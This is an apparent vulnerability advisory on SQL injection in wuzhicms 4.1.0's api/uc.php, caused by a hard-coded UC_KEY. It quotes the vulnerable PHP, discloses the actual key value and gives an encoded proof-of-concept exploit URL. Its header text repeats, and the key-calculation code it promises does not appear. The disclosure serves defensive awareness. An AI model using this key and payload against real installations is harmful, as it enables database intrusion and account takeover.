==========================
Advisory: wuzhicms api/uc.php SQL Injection Vulnerability
Author: snake.jin@DBAppSecurity
Affected Version: Latest 4.1.0
Vulnerability Description
Recetly, I found an SQL Injection Vulnerability in 'wuzhicms' because of the hard coded 'UC_KEY'.
Vulnerable cgi: /api/uc.php
<?php
$code = isset($GLOBALS['code']) ? $GLOBALS['code'] : '';
$get = $GLOBALS;
parse_str(_authcode($code, 'DECODE', UC_KEY), $get);
if(MAGIC_QUOTES_GPC) $get = _stripslashes($get);
...
if(in_array($get['action'], array('test', 'deleteuser', 'renameuser', 'gettag', 'synlogin', 'synlogout', 'updatepw', 'updatebadwords', 'updatehosts', 'updateapps', 'updateclient', 'updatecredit', 'getcreditsettings', 'updatecreditsettings'))) {
$uc_note = new uc_note();
header('Content-type: text/html; charset='.CHARSET);
$action = $get['action'];
echo $uc_note->$action($get, $post);
exit();
} else {
exit(API_RETURN_FAILED);
}
...
function synlogin($get, $post) {
header('P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"');
$username = $get['username'];
$r = $this->member->db->get_one('member', 'username="'.$username.'"');
if($r){
$cookietime = COOKIE_TTL ? SYS_TIME.COOKIE_TTL : 0;
set_cookie('auth', encode($r['uid']."\t".$r['password']."\t".$cookietime, substr(md5(_KEY), 8, 8)), $cookietime);
set_cookie('_uid', $r['uid'], $cookietime);
set_cookie('_username', $r['username'], $cookietime);
set_cookie('_groupid', $r['groupid'], $cookietime);
}
return API_RETURN_SUCCEED;
}
?>
As the code above, if we know the UC_KEY, we can decode all the $get parameters, and the 'username' parameter causes a sql injection.
Fortunately in the latest version the UC_KEY is hard coded as 'uc_key' => 'e063rbkHX22RAvIg'.
So we can use the code below to calculate the 'code' value:
wuzhicms api/uc.php SQL Injection Vulnerability
==========================
Advisory: wuzhicms api/uc.php SQL Injection Vulnerability
Author: snake.jin@DBAppSecurity
Affected Version: Latest 4.1.0
Vulnerability Description
Recetly, I found an SQL Injection Vulnerability in 'wuzhicms' because of the hard coded 'UC_KEY'.
Vulnerable cgi: /api/uc.php
As the code above, if we know the UC_KEY, we can decode all the $get parameters, and the 'username' parameter causes a sql injection.
Fortunately in the latest version the UC_KEY is hard coded as 'uc_key' => 'e063rbkHX22RAvIg'.
So we can use the code below to calculate the 'code' value:
==========================
POC && EXP
http://192.168.11.1/api/uc.php?code=50cbKM2US%2FRwJ7t%2FOIC6bRKnZEAAWvXoYeOnjmkm1lK%2F97owQgkczkqOAN4mvz%2B8VHyLhJL786q1%2FOrPS0bEbkhFBO9ugWAYjf4XLWIL9m2gPxqtBAp%2BvqOvbpnJP%2Fkal8sCBQDoqcZeS6KY2%2BDsu7LW
//Notice: parameter 'code' value depends on the web server time.
Just enjoy it!
The text was updated successfully, but these errors were encountered: